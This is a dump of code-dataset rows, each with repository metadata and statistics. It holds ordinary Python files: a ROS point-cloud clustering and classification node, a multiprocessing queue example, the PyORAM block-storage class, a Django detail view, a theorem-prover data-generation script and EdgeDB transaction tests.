rospy.spin()
| 37.834081
| 106
| 0.733555
|
#!/usr/bin/env python
import numpy as np
import sklearn
from sklearn.preprocessing import LabelEncoder
import pickle
from sensor_stick.srv import GetNormals
from sensor_stick.features import compute_color_histograms
from sensor_stick.features import compute_normal_histograms
from visualization_msgs.msg import Marker
from sensor_stick.marker_tools import *
from sensor_stick.msg import DetectedObjectsArray
from sensor_stick.msg import DetectedObject
from sensor_stick.pcl_helper import *
def get_normals(cloud):
get_normals_prox = rospy.ServiceProxy('/feature_extractor/get_normals', GetNormals)
return get_normals_prox(cloud).cluster
# Voxel Grid filter
def voxel_grid_downssampling(pcl_data, leaf_size):
# Create a VoxelGrid filter object for our input point cloud
vox = pcl_data.make_voxel_grid_filter()
# Set the voxel (or leaf) size
vox.set_leaf_size(leaf_size, leaf_size, leaf_size)
return vox.filter()
# PassThrough filter
def passthrough(pcl_data, filter_axis, axis_min, axis_max):
# Create a PassThrough filter object.
passthrough = pcl_data.make_passthrough_filter()
passthrough.set_filter_field_name(filter_axis)
passthrough.set_filter_limits(axis_min, axis_max)
return passthrough.filter()
# RANSAC plane segmentation
def ransac_plane_segmentation(pcl_data, pcl_sac_model_plane, pcl_sac_ransac, max_distance):
# Create the segmentation object
seg = pcl_data.make_segmenter()
# Set the model you wish to fit
seg.set_model_type(pcl_sac_model_plane)
seg.set_method_type(pcl_sac_ransac)
seg.set_distance_threshold(max_distance)
return seg
# Extract inliers/outliers
def extract_cloud_objects_and_cloud_table(pcl_data, ransac_segmentation):
inliers, coefficients = ransac_segmentation.segment()
cloud_table = pcl_data.extract(inliers, negative=False)
cloud_objects = pcl_data.extract(inliers, negative=True)
return cloud_table,cloud_objects
# Outlier Removal Filter
def statistical_outlier_filtering(pcl_data, mean_k, tresh):
outlier_filter = pcl_data.make_statistical_outlier_filter()
outlier_filter.set_mean_k(mean_k)
outlier_filter.set_std_dev_mul_thresh(tresh)
return outlier_filter.filter()
# Euclidean Clustering (perform a DBSCAN cluster search)
def euclidean_clustering(white_cloud):
tree = white_cloud.make_kdtree()
# Create Cluster-Mask Point Cloud to visualize each cluster separately
ec = white_cloud.make_EuclideanClusterExtraction()
# Set tolerances for distance threshold
# as well as minimum and maximum cluster size (in points)
ec.set_ClusterTolerance(0.03)
ec.set_MinClusterSize(100)
ec.set_MaxClusterSize(10000)
# Search the k-d tree for clusters
ec.set_SearchMethod(tree)
# Extract indices for each of the discovered clusters
cluster_indices = ec.Extract()
# now contains a list of indices for each cluster (a list of lists). In the next step,
# you'll create a new point cloud
# to visualize the clusters by assigning a color to each of them.
#Assign a color corresponding to each segmented object in scene
cluster_color = get_color_list(len(cluster_indices))
color_cluster_point_list = []
for j, indices in enumerate(cluster_indices):
for i, indice in enumerate(indices):
color_cluster_point_list.append([white_cloud[indice][0],
white_cloud[indice][1],
white_cloud[indice][2],
rgb_to_float(cluster_color[j])])
#Create new cloud containing all clusters, each with unique color
cluster_cloud = pcl.PointCloud_PointXYZRGB()
cluster_cloud.from_list(color_cluster_point_list)
return cluster_cloud,cluster_indices
# Callback function for your Point Cloud Subscriber
def pcl_callback(pcl_msg):
# Exercise-2 TODOs:
# TODO: Convert ROS msg to PCL data
cloud = ros_to_pcl(pcl_msg)
cloud = statistical_outlier_filtering(cloud, 10, 0.001)
# TODO: Voxel Grid Downsampling
LEAF_SIZE = 0.01
cloud = voxel_grid_downssampling(cloud, LEAF_SIZE)
# TODO: PassThrough Filter
filter_axis ='z'
axis_min = 0.50
axis_max = 0.90
cloud = passthrough(cloud, filter_axis, axis_min, axis_max)
filter_axis = 'x'
axis_min = 0.30
axis_max = 1.0
cloud = passthrough(cloud, filter_axis, axis_min, axis_max)
# TODO: RANSAC Plane Segmentation
ransac_segmentation = ransac_plane_segmentation(cloud, pcl.SACMODEL_PLANE, pcl.SAC_RANSAC, 0.01)
# TODO: Extract inliers and outliers
cloud_table, cloud_objects = extract_cloud_objects_and_cloud_table(cloud, ransac_segmentation)
# TODO: Euclidean Clustering
white_cloud = XYZRGB_to_XYZ(cloud_objects)
cluster_cloud,cluster_indices = euclidean_clustering(white_cloud)
# TODO: Create Cluster-Mask Point Cloud to visualize each cluster separately
# TODO: Convert PCL data to ROS messages
ros_cluster_cloud = pcl_to_ros(cluster_cloud)
ros_cloud_objects = pcl_to_ros(cloud_objects)
ros_cloud_table = pcl_to_ros(cloud_table)
# TODO: Publish ROS messages
pcl_objects_pub.publish(ros_cloud_objects)
pcl_table_pub.publish(ros_cloud_table)
pcl_cluster_pub.publish(ros_cluster_cloud)
# Exercise-3 TODOs:
# Classify the clusters! (loop through each detected cluster one at a time)
detected_objects_labels = []
detected_objects = []
# write a for loop to cycle through each of the segmented clusters
for index, pts_list in enumerate(cluster_indices):
# Grab the points for the cluster
pcl_cluster = cloud_objects.extract(pts_list)
# TODO: convert the cluster from pcl to ROS using helper function
ros_cluster = pcl_to_ros(pcl_cluster)
# Compute the associated feature vector
# Extract histogram features
chists = compute_color_histograms(ros_cluster, using_hsv=True)
normals = get_normals(ros_cluster)
nhists = compute_normal_histograms(normals)
feature = np.concatenate((chists, nhists))
# Make the prediction, retrieve the label for the result
# and add it to detected_objects_labels list
prediction = clf.predict(scaler.transform(feature.reshape(1, -1)))
label = encoder.inverse_transform(prediction)[0]
detected_objects_labels.append(label)
# Publish a label into RViz
label_pos = list(white_cloud[pts_list[0]])
label_pos[2] += .4
object_markers_pub.publish(make_label(label,label_pos, index))
# Add the detected object to the list of detected objects.
do = DetectedObject()
do.label = label
do.cloud = ros_cluster
detected_objects.append(do)
rospy.loginfo('Detected {} objects: {}'.format(len(detected_objects_labels), detected_objects_labels))
# Publish the list of detected objects
# This is the output you'll need to complete the upcoming project!
detected_objects_pub.publish(detected_objects)
if __name__ == '__main__':
# TODO: ROS node initialization
rospy.init_node('clustering', anonymous=True)
# TODO: Create Subscribers
pcl_sub = rospy.Subscriber("/sensor_stick/point_cloud", pc2.PointCloud2, pcl_callback, queue_size=1)
# TODO: Create Publishers
pcl_objects_pub = rospy.Publisher("/pcl_objects", PointCloud2, queue_size=1)
pcl_table_pub = rospy.Publisher("/pcl_table", PointCloud2, queue_size=1)
pcl_cluster_pub = rospy.Publisher("pcl_cluster", PointCloud2, queue_size=1)
# Create Publishers
# TODO: here you need to create two publishers
# Call them object_markers_pub and detected_objects_pub
# Have them publish to "/object_markers" and "/detected_objects" with
# Message Types "Marker" and "DetectedObjectsArray" , respectively
object_markers_pub = rospy.Publisher("/object_markers", Marker, queue_size=1)
detected_objects_pub = rospy.Publisher("/detected_objects", DetectedObjectsArray, queue_size=1)
# TODO: Load Model From disk
model = pickle.load(open('model.sav', 'rb'))
clf = model['classifier']
encoder = LabelEncoder()
encoder.classes_ = model['classes']
scaler = model['scaler']
# Initialize color_list
get_color_list.color_list = []
# TODO: Spin while node is not shutdown
while not rospy.is_shutdown():
rospy.spin()
| 6,167
| 0
| 177
|
131e860e18ee61e01c595fad8941bfb4fb5deb07
| 546
|
py
|
Python
|
examples/joinable_queue.py
|
cloudbutton/cloudbutton
|
1062693a6767badc6369a026e2b8ad011f27efbb
|
[
"Apache-2.0"
] | 7
|
2020-05-28T11:54:12.000Z
|
2020-09-26T13:16:45.000Z
|
examples/joinable_queue.py
|
cloudbutton/cloudbutton
|
1062693a6767badc6369a026e2b8ad011f27efbb
|
[
"Apache-2.0"
] | 3
|
2020-06-18T14:07:27.000Z
|
2020-06-18T14:07:28.000Z
|
examples/joinable_queue.py
|
cloudbutton/cloudbutton
|
1062693a6767badc6369a026e2b8ad011f27efbb
|
[
"Apache-2.0"
] | 5
|
2020-04-29T09:29:52.000Z
|
2020-09-22T13:42:55.000Z
|
from cloudbutton.multiprocessing import Process, JoinableQueue
if __name__ == '__main__':
q = JoinableQueue()
p = Process(target=worker, args=(q,))
p.start()
for x in range(10):
q.put(x)
# uncomment to hang on the q.join
#q.put(11)
q.join()
q.put(-1) # end loop
p.join()
| 16.545455
| 62
| 0.532967
|
from cloudbutton.multiprocessing import Process, JoinableQueue
def worker(q):
working = True
while working:
x = q.get()
# Do work that may fail
assert x < 10
# Confirm task
q.task_done()
if x == -1:
working = False
if __name__ == '__main__':
q = JoinableQueue()
p = Process(target=worker, args=(q,))
p.start()
for x in range(10):
q.put(x)
# uncomment to hang on the q.join
#q.put(11)
q.join()
q.put(-1) # end loop
p.join()
| 201
| 0
| 23
|
04c390e7857fb3752b53b9c2903420309b83a2b5
| 12,045
|
py
|
Python
|
src/pyoram/storage/block_storage_file.py
|
ghackebeil/PyORAM
|
53e109dfb1ecec52348a70ddc64fae65eea7490a
|
[
"MIT"
] | 24
|
2016-04-14T14:27:37.000Z
|
2022-03-13T13:53:18.000Z
|
src/pyoram/storage/block_storage_file.py
|
ghackebeil/PyORAM
|
53e109dfb1ecec52348a70ddc64fae65eea7490a
|
[
"MIT"
] | 4
|
2016-03-14T04:40:23.000Z
|
2016-06-01T04:37:18.000Z
|
src/pyoram/storage/block_storage_file.py
|
ghackebeil/PyORAM
|
53e109dfb1ecec52348a70ddc64fae65eea7490a
|
[
"MIT"
] | 4
|
2016-03-16T23:53:24.000Z
|
2020-05-27T19:27:37.000Z
|
__all__ = ('BlockStorageFile',)
import os
import struct
import logging
import errno
from multiprocessing.pool import ThreadPool
import pyoram
from pyoram.storage.block_storage import \
(BlockStorageInterface,
BlockStorageTypeFactory)
import tqdm
import six
from six.moves import xrange
log = logging.getLogger("pyoram")
class BlockStorageFile(BlockStorageInterface):
"""
A class implementing the block storage interface
using a local file.
"""
_index_struct_string = "!LLL?"
_index_offset = struct.calcsize(_index_struct_string)
# This method is usually executed in another thread, so
# do not attempt to handle exceptions because it will
# not work.
#
# Define BlockStorageInterface Methods
#
@classmethod
@classmethod
@property
@property
@property
@property
@property
@property
BlockStorageTypeFactory.register_device("file", BlockStorageFile)
| 35.955224
| 92
| 0.532337
|
__all__ = ('BlockStorageFile',)
import os
import struct
import logging
import errno
from multiprocessing.pool import ThreadPool
import pyoram
from pyoram.storage.block_storage import \
(BlockStorageInterface,
BlockStorageTypeFactory)
import tqdm
import six
from six.moves import xrange
log = logging.getLogger("pyoram")
class default_filesystem(object):
open = open
remove = os.remove
stat = os.stat
class BlockStorageFile(BlockStorageInterface):
"""
A class implementing the block storage interface
using a local file.
"""
_index_struct_string = "!LLL?"
_index_offset = struct.calcsize(_index_struct_string)
def __init__(self,
storage_name,
threadpool_size=None,
ignore_lock=False,
_filesystem=default_filesystem):
self._bytes_sent = 0
self._bytes_received = 0
self._filesystem = _filesystem
self._ignore_lock = ignore_lock
self._f = None
self._pool = None
self._close_pool = True
self._async_write = None
self._storage_name = storage_name
self._f = self._filesystem.open(self.storage_name, "r+b")
self._f.seek(0)
self._block_size, self._block_count, user_header_size, locked = \
struct.unpack(
BlockStorageFile._index_struct_string,
self._f.read(BlockStorageFile._index_offset))
if locked and (not self._ignore_lock):
self._f.close()
self._f = None
raise IOError(
"Can not open block storage device because it is "
"locked by another process. To ignore this check, "
"initialize this class with the keyword 'ignore_lock' "
"set to True.")
self._user_header_data = bytes()
if user_header_size > 0:
self._user_header_data = \
self._f.read(user_header_size)
self._header_offset = BlockStorageFile._index_offset + \
len(self._user_header_data)
# TODO: Figure out why this is required for Python3
# in order to prevent issues with the
# TopCachedEncryptedHeapStorage class. The
# problem has something to do with bufferedio,
# but it makes no sense why this fixes it (all
# we've done is read above these lines). As
# part of this, investigate whethor or not we
# need the call to flush after write_block(s),
# or if its simply connected to some Python3
# bug in bufferedio.
self._f.flush()
if not self._ignore_lock:
# turn on the locked flag
self._f.seek(0)
self._f.write(
struct.pack(BlockStorageFile._index_struct_string,
self.block_size,
self.block_count,
len(self._user_header_data),
True))
self._f.flush()
if threadpool_size != 0:
self._pool = ThreadPool(threadpool_size)
def _check_async(self):
if self._async_write is not None:
self._async_write.get()
self._async_write = None
# TODO: Figure out why tests fail on Python3 without this
if six.PY3:
if self._f is None:
return
self._f.flush()
def _schedule_async_write(self, args, callback=None):
assert self._async_write is None
if self._pool is not None:
self._async_write = \
self._pool.apply_async(self._writev, (args, callback))
else:
self._writev(args, callback)
# This method is usually executed in another thread, so
# do not attempt to handle exceptions because it will
# not work.
def _writev(self, chunks, callback):
for i, block in chunks:
self._f.seek(self._header_offset + i * self.block_size)
self._f.write(block)
if callback is not None:
callback(i)
def _prep_for_close(self):
self._check_async()
if self._close_pool and (self._pool is not None):
self._pool.close()
self._pool.join()
self._pool = None
if self._f is not None:
if not self._ignore_lock:
# turn off the locked flag
self._f.seek(0)
self._f.write(
struct.pack(BlockStorageFile._index_struct_string,
self.block_size,
self.block_count,
len(self._user_header_data),
False))
self._f.flush()
#
# Define BlockStorageInterface Methods
#
def clone_device(self):
f = BlockStorageFile(self.storage_name,
threadpool_size=0,
ignore_lock=True)
f._pool = self._pool
f._close_pool = False
return f
@classmethod
def compute_storage_size(cls,
block_size,
block_count,
header_data=None,
ignore_header=False):
assert (block_size > 0) and (block_size == int(block_size))
assert (block_count > 0) and (block_count == int(block_count))
if header_data is None:
header_data = bytes()
if ignore_header:
return block_size * block_count
else:
return BlockStorageFile._index_offset + \
len(header_data) + \
block_size * block_count
@classmethod
def setup(cls,
storage_name,
block_size,
block_count,
initialize=None,
header_data=None,
ignore_existing=False,
threadpool_size=None,
_filesystem=default_filesystem):
if (not ignore_existing):
_exists = True
try:
_filesystem.stat(storage_name)
except OSError as e:
if e.errno == errno.ENOENT:
_exists = False
if _exists:
raise IOError(
"Storage location already exists: %s"
% (storage_name))
if (block_size <= 0) or (block_size != int(block_size)):
raise ValueError(
"Block size (bytes) must be a positive integer: %s"
% (block_size))
if (block_count <= 0) or (block_count != int(block_count)):
raise ValueError(
"Block count must be a positive integer: %s"
% (block_count))
if (header_data is not None) and \
(type(header_data) is not bytes):
raise TypeError(
"'header_data' must be of type bytes. "
"Invalid type: %s" % (type(header_data)))
if initialize is None:
zeros = bytes(bytearray(block_size))
initialize = lambda i: zeros
try:
with _filesystem.open(storage_name, "wb") as f:
# create_index
if header_data is None:
f.write(struct.pack(BlockStorageFile._index_struct_string,
block_size,
block_count,
0,
False))
else:
f.write(struct.pack(BlockStorageFile._index_struct_string,
block_size,
block_count,
len(header_data),
False))
f.write(header_data)
with tqdm.tqdm(total=block_count*block_size,
desc="Initializing File Block Storage Space",
unit="B",
unit_scale=True,
disable=not pyoram.config.SHOW_PROGRESS_BAR) as progress_bar:
for i in xrange(block_count):
block = initialize(i)
assert len(block) == block_size, \
("%s != %s" % (len(block), block_size))
f.write(block)
progress_bar.update(n=block_size)
except: # pragma: no cover
_filesystem.remove(storage_name) # pragma: no cover
raise # pragma: no cover
return BlockStorageFile(storage_name,
threadpool_size=threadpool_size,
_filesystem=_filesystem)
@property
def header_data(self):
return self._user_header_data
@property
def block_count(self):
return self._block_count
@property
def block_size(self):
return self._block_size
@property
def storage_name(self):
return self._storage_name
def update_header_data(self, new_header_data):
self._check_async()
if len(new_header_data) != len(self.header_data):
raise ValueError(
"The size of header data can not change.\n"
"Original bytes: %s\n"
"New bytes: %s" % (len(self.header_data),
len(new_header_data)))
self._user_header_data = bytes(new_header_data)
self._f.seek(BlockStorageFile._index_offset)
self._f.write(self._user_header_data)
def close(self):
self._prep_for_close()
if self._f is not None:
try:
self._f.close()
except OSError: # pragma: no cover
pass # pragma: no cover
self._f = None
def read_blocks(self, indices):
self._check_async()
blocks = []
for i in indices:
assert 0 <= i < self.block_count
self._bytes_received += self.block_size
self._f.seek(self._header_offset + i * self.block_size)
blocks.append(self._f.read(self.block_size))
return blocks
def yield_blocks(self, indices):
self._check_async()
for i in indices:
assert 0 <= i < self.block_count
self._bytes_received += self.block_size
self._f.seek(self._header_offset + i * self.block_size)
yield self._f.read(self.block_size)
def read_block(self, i):
self._check_async()
assert 0 <= i < self.block_count
self._bytes_received += self.block_size
self._f.seek(self._header_offset + i * self.block_size)
return self._f.read(self.block_size)
def write_blocks(self, indices, blocks, callback=None):
self._check_async()
chunks = []
for i, block in zip(indices, blocks):
assert 0 <= i < self.block_count
assert len(block) == self.block_size, \
("%s != %s" % (len(block), self.block_size))
self._bytes_sent += self.block_size
chunks.append((i, block))
self._schedule_async_write(chunks, callback=callback)
def write_block(self, i, block):
self._check_async()
assert 0 <= i < self.block_count
assert len(block) == self.block_size
self._bytes_sent += self.block_size
self._schedule_async_write(((i, block),))
@property
def bytes_sent(self):
return self._bytes_sent
@property
def bytes_received(self):
return self._bytes_received
BlockStorageTypeFactory.register_device("file", BlockStorageFile)
| 10,442
| 70
| 581
|
81fad6a313131369b06b9a12a0f5f95247a51169
| 951
|
py
|
Python
|
goutham_assignment/Company/views.py
|
xWaterBottlex/kutumb-assignment
|
c5deb51342394dc7e2c996a24cdf5e2662ded796
|
[
"MIT"
] | null | null | null |
goutham_assignment/Company/views.py
|
xWaterBottlex/kutumb-assignment
|
c5deb51342394dc7e2c996a24cdf5e2662ded796
|
[
"MIT"
] | 3
|
2021-06-08T21:41:51.000Z
|
2022-01-13T02:49:13.000Z
|
goutham_assignment/Company/views.py
|
GouthamDoddi/kutumb-assignment
|
c5deb51342394dc7e2c996a24cdf5e2662ded796
|
[
"MIT"
] | null | null | null |
from django.contrib.auth.mixins import LoginRequiredMixin
from django.apps import apps
from django.views.generic import DetailView, CreateView
from django.http import HttpResponse, HttpRequest, request
from django.core.signals import request_finished
from django.dispatch import receiver
Company = apps.get_model('Company', 'Company')
| 28.818182
| 58
| 0.660358
|
from django.contrib.auth.mixins import LoginRequiredMixin
from django.apps import apps
from django.views.generic import DetailView, CreateView
from django.http import HttpResponse, HttpRequest, request
from django.core.signals import request_finished
from django.dispatch import receiver
Company = apps.get_model('Company', 'Company')
class PostDetailView(DetailView):
model = Company
def get_object(self, *args, **kwargs):
obj = super().get_object()
try:
self.request.session['viewed']
except KeyError:
self.request.session['viewed'] = False
else:
pass
while not self.request.session['viewed']:
obj.total_viewers += 1
obj.save()
self.request.session['viewed'] = True
return obj
return obj
class PostCreateView(LoginRequiredMixin, CreateView):
model = Company
fields = ['name', 'logo', 'address']
| 415
| 152
| 46
|
c54051df8e2aea44fdfe329ae2ee54ce18aa91a8
| 2,223
|
py
|
Python
|
generate_payout_data_script.py
|
dwhalen/holophrasm
|
0d971428f9879ad3d6c0a781f1a021cff73fb1ce
|
[
"MIT"
] | 33
|
2016-09-23T15:05:24.000Z
|
2021-08-30T11:13:35.000Z
|
generate_payout_data_script.py
|
dwhalen/holophrasm
|
0d971428f9879ad3d6c0a781f1a021cff73fb1ce
|
[
"MIT"
] | 4
|
2016-12-14T03:41:55.000Z
|
2020-05-27T20:27:55.000Z
|
generate_payout_data_script.py
|
dwhalen/holophrasm
|
0d971428f9879ad3d6c0a781f1a021cff73fb1ce
|
[
"MIT"
] | 12
|
2016-08-20T10:40:21.000Z
|
2022-01-03T09:47:01.000Z
|
import time
from tree_parser import *
from data_utils5 import *
import os
import withpool
text = file_contents()
database = meta_math_database(text,n=None, remember_proof_steps=True)
print()
lm = LanguageModel(database)
saved_interface = None
# import
import build_payout_data_set as pd
pd.initialize_interface(lm, 'searcher')
valp = lm.validation_propositions
testp = lm.test_propositions
trainp = lm.training_propositions
chunk_size = len(trainp)//8
chunks = [
valp,
testp,
trainp[:chunk_size],
trainp[chunk_size:2*chunk_size],
trainp[2*chunk_size:3*chunk_size],
trainp[3*chunk_size:4*chunk_size],
trainp[4*chunk_size:5*chunk_size],
trainp[5*chunk_size:6*chunk_size],
trainp[6*chunk_size:7*chunk_size],
trainp[7*chunk_size:]
]
for i, chunk in enumerate(chunks):
filename = 'payout_data_'+str(i)
if os.path.exists(filename):
continue
# okay. we're doing this one.
# claim it.
with open(filename, 'wb') as handle:
pickle.dump(None, handle)
# do the stuff.
print('generating chunk: '+filename)
with withpool.Pool(None) as pool:
allpds = pool.map(process_chunk, [(i,j) for j in range(len(chunk))], chunksize=1)
print('saving '+filename)
with open(filename, 'wb') as handle:
pickle.dump(allpds, handle)
#
# def validation_data(n):
# print 'starting item',n
# return pd.PropositionsData(valp[n])
''' let's do this in chunks
import withpool
with withpool.Pool(8) as pool:
start = time.time()
allpds = {}
allpds['validation'] = pool.map(validation_data, range(len(valp)), chunksize=1)
print (time.time()-start), (time.time()-start)/len(valp)
allpds['test'] = pool.map(test_data, range(len(testp)), chunksize=1)
print (time.time()-start), (time.time()-start)/(len(valp)+len(testp))
allpds['training'] = pool.map(training_data, range(len(trainp)), chunksize=1)
print (time.time()-start), (time.time()-start)/(len(valp)+len(testp)+len(trainp))
print 'saving database'
import pickle
with open('payout_data','wb') as handle:
pickle.dump(allpds, handle)
'''
| 24.977528
| 89
| 0.689159
|
import time
from tree_parser import *
from data_utils5 import *
import os
import withpool
text = file_contents()
database = meta_math_database(text,n=None, remember_proof_steps=True)
print()
lm = LanguageModel(database)
saved_interface = None
# import
import build_payout_data_set as pd
pd.initialize_interface(lm, 'searcher')
valp = lm.validation_propositions
testp = lm.test_propositions
trainp = lm.training_propositions
chunk_size = len(trainp)//8
chunks = [
valp,
testp,
trainp[:chunk_size],
trainp[chunk_size:2*chunk_size],
trainp[2*chunk_size:3*chunk_size],
trainp[3*chunk_size:4*chunk_size],
trainp[4*chunk_size:5*chunk_size],
trainp[5*chunk_size:6*chunk_size],
trainp[6*chunk_size:7*chunk_size],
trainp[7*chunk_size:]
]
def process_chunk(x):
i,j = x
print('on chunk', i, 'item', j, '/', len(chunks[i]))
return pd.PropositionsData(chunks[i][j])
for i, chunk in enumerate(chunks):
filename = 'payout_data_'+str(i)
if os.path.exists(filename):
continue
# okay. we're doing this one.
# claim it.
with open(filename, 'wb') as handle:
pickle.dump(None, handle)
# do the stuff.
print('generating chunk: '+filename)
with withpool.Pool(None) as pool:
allpds = pool.map(process_chunk, [(i,j) for j in range(len(chunk))], chunksize=1)
print('saving '+filename)
with open(filename, 'wb') as handle:
pickle.dump(allpds, handle)
#
# def validation_data(n):
# print 'starting item',n
# return pd.PropositionsData(valp[n])
''' let's do this in chunks
import withpool
with withpool.Pool(8) as pool:
start = time.time()
allpds = {}
allpds['validation'] = pool.map(validation_data, range(len(valp)), chunksize=1)
print (time.time()-start), (time.time()-start)/len(valp)
allpds['test'] = pool.map(test_data, range(len(testp)), chunksize=1)
print (time.time()-start), (time.time()-start)/(len(valp)+len(testp))
allpds['training'] = pool.map(training_data, range(len(trainp)), chunksize=1)
print (time.time()-start), (time.time()-start)/(len(valp)+len(testp)+len(trainp))
print 'saving database'
import pickle
with open('payout_data','wb') as handle:
pickle.dump(allpds, handle)
'''
| 114
| 0
| 23
|
8a1bf4a8337112febfa3b668351586f40df2a744
| 6,427
|
py
|
Python
|
tests/test_sync_tx_legacy.py
|
fantix/edgedb-python
|
2d8deaec503a206555f97f3f71952462e3483629
|
[
"Apache-2.0"
] | null | null | null |
tests/test_sync_tx_legacy.py
|
fantix/edgedb-python
|
2d8deaec503a206555f97f3f71952462e3483629
|
[
"Apache-2.0"
] | null | null | null |
tests/test_sync_tx_legacy.py
|
fantix/edgedb-python
|
2d8deaec503a206555f97f3f71952462e3483629
|
[
"Apache-2.0"
] | null | null | null |
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2016-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import edgedb
from edgedb import _testbase as tb
| 32.135
| 77
| 0.525751
|
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2016-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import edgedb
from edgedb import _testbase as tb
class TestSyncTxLegacy(tb.SyncQueryTestCase):
    """Tests for the legacy blocking (sync) ``transaction()`` API."""

    # Each test manages its own transactions explicitly, so per-method
    # isolation is disabled.
    ISOLATED_METHODS = False
    SETUP = '''
        CREATE TYPE test::TransactionTest EXTENDING std::Object {
            CREATE PROPERTY name -> std::str;
        };
    '''
    TEARDOWN = '''
        DROP TYPE test::TransactionTest;
    '''
    def test_sync_transaction_regular_01(self):
        """An exception inside a ``with transaction`` block rolls it back."""
        self.assertIsNone(self.con._top_xact)
        tr = self.con.transaction()
        self.assertIsNone(self.con._top_xact)
        with self.assertRaises(ZeroDivisionError):
            with tr as with_tr:
                self.assertIs(self.con._top_xact, tr)
                # We don't return the transaction object from __aenter__,
                # to make it harder for people to use '.rollback()' and
                # '.commit()' from within an 'with' block.
                self.assertIsNone(with_tr)
                self.con.execute('''
                    INSERT test::TransactionTest {
                        name := 'Test Transaction'
                    };
                ''')
                # Deliberately abort the block after the INSERT.
                1 / 0
        self.assertIsNone(self.con._top_xact)
        # The INSERT must have been rolled back.
        result = self.con.query('''
            SELECT
                test::TransactionTest
            FILTER
                test::TransactionTest.name = 'Test Transaction';
        ''')
        self.assertEqual(result, [])
    def test_sync_transaction_nested_01(self):
        """Nested transactions commit or roll back with the outermost one."""
        self.assertIsNone(self.con._top_xact)
        tr = self.con.transaction()
        self.assertIsNone(self.con._top_xact)
        with self.assertRaises(ZeroDivisionError):
            with tr:
                self.assertIs(self.con._top_xact, tr)
                # Inner transaction: completes normally, so its INSERT is
                # visible inside the (still open) outer transaction.
                with self.con.transaction():
                    self.assertIs(self.con._top_xact, tr)
                    self.con.execute('''
                        INSERT test::TransactionTest {
                            name := 'TXTEST 1'
                        };
                    ''')
                self.assertIs(self.con._top_xact, tr)
                # Inner transaction: fails, so only its own INSERT is undone.
                with self.assertRaises(ZeroDivisionError):
                    in_tr = self.con.transaction()
                    with in_tr:
                        self.assertIs(self.con._top_xact, tr)
                        self.con.query('''
                            INSERT test::TransactionTest {
                                name := 'TXTEST 2'
                            };
                        ''')
                        1 / 0
                # Only 'TXTEST 1' survives the failed inner transaction.
                recs = self.con.query('''
                    SELECT
                        test::TransactionTest {
                            name
                        }
                    FILTER
                        test::TransactionTest.name LIKE 'TXTEST%';
                ''')
                self.assertEqual(len(recs), 1)
                self.assertEqual(recs[0].name, 'TXTEST 1')
                self.assertIs(self.con._top_xact, tr)
                # Abort the outer transaction; everything must roll back.
                1 / 0
        self.assertIs(self.con._top_xact, None)
        recs = self.con.query('''
            SELECT
                test::TransactionTest {
                    name
                }
            FILTER
                test::TransactionTest.name LIKE 'TXTEST%';
        ''')
        self.assertEqual(len(recs), 0)
    def test_sync_transaction_nested_02(self):
        """Nested transactions may not change isolation/readonly/deferrable."""
        with self.con.transaction(isolation='repeatable_read'):
            with self.con.transaction():  # no explicit isolation, OK
                pass
        with self.assertRaisesRegex(edgedb.InterfaceError,
                                    r'different isolation'):
            with self.con.transaction(isolation='repeatable_read'):
                with self.con.transaction(isolation='serializable'):
                    pass
        with self.assertRaisesRegex(edgedb.InterfaceError,
                                    r'different read-write'):
            with self.con.transaction():
                with self.con.transaction(readonly=True):
                    pass
        with self.assertRaisesRegex(edgedb.InterfaceError,
                                    r'different deferrable'):
            with self.con.transaction(deferrable=True):
                with self.con.transaction(deferrable=False):
                    pass
    def test_sync_transaction_interface_errors(self):
        """Misuse of start/commit/rollback inside ``with`` raises InterfaceError."""
        self.assertIsNone(self.con._top_xact)
        tr = self.con.transaction()
        # Starting a transaction that the 'with' already started.
        with self.assertRaisesRegex(edgedb.InterfaceError,
                                    r'cannot start; .* already started'):
            with tr:
                tr.start()
        self.assertTrue(repr(tr).startswith(
            '<edgedb.Transaction state:rolledback'))
        self.assertIsNone(self.con._top_xact)
        # Re-entering a transaction object that was already rolled back.
        with self.assertRaisesRegex(edgedb.InterfaceError,
                                    r'cannot start; .* already rolled back'):
            with tr:
                pass
        self.assertIsNone(self.con._top_xact)
        tr = self.con.transaction()
        # Manual commit inside a 'with' block is forbidden.
        with self.assertRaisesRegex(edgedb.InterfaceError,
                                    r'cannot manually commit.*with'):
            with tr:
                tr.commit()
        self.assertIsNone(self.con._top_xact)
        tr = self.con.transaction()
        # Manual rollback inside a 'with' block is forbidden.
        with self.assertRaisesRegex(edgedb.InterfaceError,
                                    r'cannot manually rollback.*with'):
            with tr:
                tr.rollback()
        self.assertIsNone(self.con._top_xact)
        tr = self.con.transaction()
        # Re-entering the same transaction context is forbidden.
        with self.assertRaisesRegex(edgedb.InterfaceError,
                                    r'cannot enter context:.*with'):
            with tr:
                with tr:
                    pass
| 5,293
| 379
| 23
|
a76c710880e5cbafaca952cb802c9f15bd1e9aa8
| 4,297
|
py
|
Python
|
condense/torch/agent.py
|
SirBubbls/condense
|
e28f008477fe75c24b43cc853b2dc6d923f01813
|
[
"MIT"
] | null | null | null |
condense/torch/agent.py
|
SirBubbls/condense
|
e28f008477fe75c24b43cc853b2dc6d923f01813
|
[
"MIT"
] | null | null | null |
condense/torch/agent.py
|
SirBubbls/condense
|
e28f008477fe75c24b43cc853b2dc6d923f01813
|
[
"MIT"
] | null | null | null |
"""This file contains the implementation for basic pruning operations on arbitrary torch modules."""
import torch
import torch.nn as nn
import copy
from condense.optimizer.sparsity_functions import Constant
def calc_parameter_sparsity(p):
"""Calculates the sparsity percentage of a torch parameter.
Args:
p: torch parameter
Returns: sparsity percentage (as float) with range [0.0, 1.0]
"""
